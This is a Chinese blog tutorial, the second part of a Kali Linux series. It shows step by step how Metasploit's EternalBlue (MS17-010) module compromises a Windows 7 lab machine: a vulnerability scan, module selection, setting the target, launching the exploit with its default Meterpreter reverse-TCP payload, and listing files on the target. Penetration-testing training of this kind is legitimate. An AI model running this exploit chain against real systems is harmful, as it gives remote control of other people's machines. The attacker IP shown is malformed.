接上文 Kali渗透测试:使用工具Metasploit攻击操作系统(一)https://developer.aliyun.com/article/1618443
实验环境
攻击机:Linux kali 5.10.0 IP : 192.168.68125
靶 机:Win7 IP : 192.168.68.159
步 骤
- 启动Metasploit,加载检测脚本
确定目标系统是否存在MS17_010漏洞,输入如下命令:
msf6 > use auxiliary/scanner/smb/smb_ms17_010
使用smb_ms17_010对目标进行扫描,命令如下:
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.68.159
rhosts => 192.168.68.159
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
结果如下图所示:
图中显示“Host is likely VULNERABLE to MS17-010!”,可以判断存在该漏洞。
2. 查找MS17_010漏洞渗透模块
输入如下命令:
msf6 auxiliary(scanner/smb/smb_ms17_010) > search ms17_010
查找到的MS17_010相关模块,如下图所示:
这里我们选择编号为0的exploit/windows/smb/ms17_010_eternalblue。这个模块可以成功的对64位的Windows7和Windows Server 2008进行渗透,其他系统可能会导致目标主机蓝屏或无效。
3. 启动MS17_010模块
在Metasploit中使用use加上模块名启动该模块,如下命令:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
启动模块后,使用show options命令查看这个模块需要设置的参数:
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
命令执行后显示设置的参数如下图所示:
- 参数RHOSTS 赋值
上图中箭头所指RHOSTS参数是指目标主机的IP地址,也就是靶机Win7的IP地址。使用set加上参数名称空格加上IP,命令如下:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.68.159
RHOSTS => 192.168.68.159
至此,我们已经完成了ms17_010_eternal模块的全部设置。
5. 进行攻击,执行run
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
从上图中看到,攻击成功。接下来可以在目标主机上运行一些命令,如dir查看文件,可以对照靶机系统文件夹,如下图所示:
演示完毕,欢迎点赞,收藏和转发!